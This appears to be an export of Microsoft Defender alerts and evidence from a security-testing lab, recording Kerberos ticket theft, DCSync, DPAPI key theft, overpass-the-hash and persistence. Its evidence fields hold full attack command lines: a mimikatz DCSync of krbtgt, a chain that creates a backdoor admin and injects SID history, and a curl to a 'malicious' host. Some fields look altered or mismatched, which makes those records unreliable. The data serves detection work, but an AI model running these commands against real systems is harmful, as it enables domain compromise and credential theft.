null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:19:16.9766667Z | Malicious | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:41.86Z | Suspicious | Active | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d | 8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b | explorer.exe | C:\Windows | 4,680 | Explorer.EXE | 2022-11-10T07:07:26.0872385Z | 4,684 | 2022-11-10T07:07:25.9825113Z | userinit.exe | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T21:50:32.66Z | Benign | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:44.8266667Z | Benign | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 11,616 | powershell.exe C:\M365DAttack\Get-KRBTicket.ps1 | 2022-11-21T02:01:44.3957302Z | null | null | null | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638072957109047022_-1951943437 | 7a218a68-6d11-49a4-82d9-c0310ab253ed | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:30.9047201Z | 2022-12-22T08:48:31.6266667Z | null | 2022-12-22T08:26:21.72798Z | 2022-12-22T08:47:12.1411574Z | Suspicious RDP session | A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives. | SuspiciousActivity | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8 | null | null | null | [
"T1021.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "lab.net",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:23.9030784Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 2796,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-12-22T08:26:24.0772409Z",
"processId": 1896,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": "userinit.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:19.8141047Z",
"parentProcessFileName": "winlogon.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4656,
"processCommandLine": "userinit.exe",
"processCreationTime": "2022-12-22T08:26:23.9030784Z",
"processId": 2796,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "470c3e60f9b2b6d83f95c7916a5361e34dec3471",
"sha256": "1fe7f7c59ec7eaa276739fa85f7dda6136d81184e0aeb385b6ac9feaaa8c4394",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:07:32.1166667Z | Suspicious | None | darol | test.domain | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963602752501_-1659845888 | c3dcc8f4-55a0-4639-a47d-54119027dd1f | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:59:20.2752831Z | 2022-12-22T08:59:20.6866667Z | null | 2022-12-22T08:47:53.119148Z | 2022-12-22T08:47:53.119148Z | Pass-the-ticket attack | A .kirbi file, a known file extension for Kerberos tickets containing local authenticated users credentials, was observed being created on the machine. This behavior might be associated with an attacker trying to move laterally in the network using stolen user credentials as part of Pass-The-Tickets” attack | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | dc47cd98-e905-40ed-ac04-59c4ff6b97ee | null | null | null | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:59:20.2933333Z",
"fileName": "ticket.kirbi",
"filePath": "C:\\M365DAttack\\Admin-Tickets",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "c7246f9646d4c96c1400ba1f11ae0d5269f1613e",
"sha256": "26f990a0ee7c4e8d73066661d94a457bc0c39651f9749cb34bc50cfc4e3155f4",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:57:32.0566667Z | Suspicious | None | svc_acct | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 4,216 | PSEXESVC.exe | 2022-12-22T08:47:50.8661147Z | 748 | 2022-12-22T08:38:52.5569028Z | services.exe | C:\Windows\System32 | Detected | 4f111b3b2366eacdcc66d7ad73548fff9b039c15 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:12:07.6266667Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
aa34310f27-bb21-4e63-a412-b971ff37f4f2 | 34310f27-bb21-4e63-a412-b971ff37f4f2 | 686 | MicrosoftDefenderForIdentity | 2022-11-11T08:24:15.3930109Z | 2022-11-12T01:40:19.2533333Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:54.266549Z | 2022-11-11T08:17:54.268357Z | Remote code execution attempt | An actor attempted to run commands remotely on MSDXV2-DC from MSDXV2-Win10V, using 1 service. | Execution | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | AzureATP | RemoteExecutionSecurityAlert | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1047",
"T1059",
"T1053",
"T1569",
"T1059.001",
"T1053.002",
"T1053.005",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
aab82c6269-6067-4e63-b900-403ae87aa3ea | b82c6269-6067-4e63-b900-403ae87aa3ea | 765 | MicrosoftDefenderForIdentity | 2022-11-21T02:12:59.7139959Z | 2022-11-26T01:38:29.5733333Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:06:50.40388Z | 2022-11-21T02:15:06.152131Z | Malicious request of Data Protection API (DPAPI) master key | Steve Lewis (IT director) on MSDXV2-Win10V successfully obtained the DPAPI domain backup key from MSDXV2-DC. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | AzureATP | RetrieveDataProtectionBackupKeySecurityAlert | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1555",
"T1555.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:22:39.7433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:05:47.3Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 9,780 | "mimikatz.exe" "lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt" exit | 2022-11-21T02:02:27.1310359Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638045938689134121_-241615733 | da638045938689134121_-241615733 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:17:48.91351Z | 2022-11-21T02:19:23.2233333Z | null | 2022-11-21T02:04:18.4087694Z | 2022-11-21T02:04:18.4088127Z | Successful logon using overpass-the-hash with potentially stolen credentials | An attacker accessed a resource with credentials that might have been obtained using an overpass-the-hash attack. An overpass-the-hash attack typically involves obtaining a password hash from memory and then using the hash to obtain a Kerberos ticket. The ticket is then used to authenticate to network resources. | LateralMovement | New | Medium | null | UnsupportedAlertType | null | null | MTP | 9bd9c53d-2d3a-4af1-8c6d-a1d33ec33ede | null | null | null | [
"T1550.002",
"T1550.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:17:48.9433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:17:48.9433333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:17:49.0366667Z",
"fileName": "lsass.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "cb9a0740d4e6270f032b289f41bf152a813bba9a",
"sha256": "6cfff639a6c9d8a9fbc6d1df8c239e089a505ac8ae6aceed422bd3dd94be16dc",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:17:49.0366667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T09:02:48.4133333Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 7,772 | curl http://malicious | 2022-12-22T08:47:23.3350389Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-12T02:16:44.7666667Z | Malicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045935113744267_1561680225 | 02e6af6b-d1cc-4482-939d-e15e8a5f6e16 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:11:51.3744432Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:07:15.8948675Z | 2022-11-21T02:34:15.7485618Z | Suspicious account creation | A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization. | Persistence | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1136",
"T1136.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.1389846Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 7232,
"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:07:15.6313121Z",
"processId": 3020,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 3020,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:07:15.6863696Z",
"processId": 5996,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:07.05Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.0073785Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 6984,
